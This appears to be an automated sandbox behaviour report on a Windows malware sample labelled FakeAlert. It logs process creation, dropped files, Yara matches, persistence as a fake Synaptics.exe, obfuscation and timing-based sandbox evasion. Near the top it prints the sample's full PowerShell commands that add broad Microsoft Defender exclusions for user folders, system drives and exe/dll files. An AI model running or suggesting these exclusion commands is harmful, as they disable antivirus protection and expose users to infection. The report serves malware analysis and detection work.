Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004747D8 FindResourceA, 6_2_004747D8
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Virustotal: Detection: 62%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError, 6_2_00475958
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 7_2_00403640
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError, 9_2_00475958
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError, 12_2_00475958
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_004021AA CoCreateInstance, 7_2_004021AA
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00409ED2 GetDiskFreeSpaceA, 6_2_00409ED2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\ProgramData\Synaptics\Synaptics.exe Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
Source: C:\Users\user\Desktop\._cache_uniformerede.exe File written: C:\Users\user\AppData\Local\Temp\udfrielser.ini
Source: Yara match File source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED
Source: C:\ProgramData\Synaptics\Synaptics.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static file information: File size 1490944 > 1048576
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

Data Obfuscation

Source: Yara match File source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00446564 push 004465F1h; ret 6_2_004465E9
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00406B3C push 00406B8Dh; ret 6_2_00406B85
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00478CB0 push 00478D2Dh; ret 6_2_00478D25
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00422044 push ecx; mov dword ptr [esp], edx 6_2_00422049
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042E010 push 0042E03Ch; ret 6_2_0042E034
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0046C0B0 push ecx; mov dword ptr [esp], eax 6_2_0046C0B2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004761F8 push 0047623Bh; ret 6_2_00476233
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0049419C push 004941CFh; ret 6_2_004941C7
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042E1BC push 0042E1E8h; ret 6_2_0042E1E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00480210 push 0048023Ch; ret 6_2_00480234
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004842DC push 00484308h; ret 6_2_00484300
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048036C push 00480398h; ret 6_2_00480390
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042C3D0 push 0042C3FCh; ret 6_2_0042C3F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00432468 push 004324B4h; ret 6_2_004324AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00486408 push 004864ADh; ret 6_2_004864A5
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0047C404 push 0047C430h; ret 6_2_0047C428
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00432404 push 00432447h; ret 6_2_0043243F
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004324C0 push 0043250Bh; ret 6_2_00432503
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042C4C4 push 0042C4F0h; ret 6_2_0042C4E8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004464FC push 00446562h; ret 6_2_0044655A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00490554 push 00490580h; ret 6_2_00490578
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0047A514 push 0047A540h; ret 6_2_0047A538
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00432518 push 00432544h; ret 6_2_0043253C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00496530 push 00496586h; ret 6_2_0049657E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048859C push 004885DEh; ret 6_2_004885D6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00432650 push 004326C6h; ret 6_2_004326BE
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0049A6BC push 0049A745h; ret 6_2_0049A73D
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00480744 push 00480770h; ret 6_2_00480768
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0049A750 push 0049A776h; ret 6_2_0049A76E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048077C push 004807A8h; ret 6_2_004807A0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048477C push 004847A8h; ret 6_2_004847A0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList, 6_2_004730FC

Persistence and Installation Behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\ProgramData\Synaptics\RCXCD96.tmp
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File created: C:\Users\user\Desktop\._cache_uniformerede.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe
Source: C:\Users\user\Desktop\._cache_uniformerede.exe File created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe
Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\RCXF979.tmp
Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp

Hooking and other Techniques for Hiding and Protection

Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (31).png
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 6_2_00459934
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 6_2_0042C6FC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044083C IsIconic,GetCapture, 6_2_0044083C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 6_2_0045695C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 6_2_004410F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 6_2_00441A14
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 9_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 9_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044083C IsIconic,GetCapture, 9_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 9_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 9_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 9_2_00441A14
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 12_2_00459934
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect, 12_2_0042C6FC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044083C IsIconic,GetCapture, 12_2_0044083C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 12_2_0045695C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 12_2_004410F0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 12_2_00441A14
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_0042E3B4
Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\._cache_uniformerede.exe RDTSC instruction interceptor: First address: 000000000310E555 second address: 000000000310E555 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F0604C38FC6h 0x00000006 cmp al, 87h 0x00000008 inc ebp 0x00000009 test edx, ebx 0x0000000b inc ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00435BD4 6_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00435BD4 9_2_00435BD4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00435BD4 12_2_00435BD4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep count: 5521 > 30
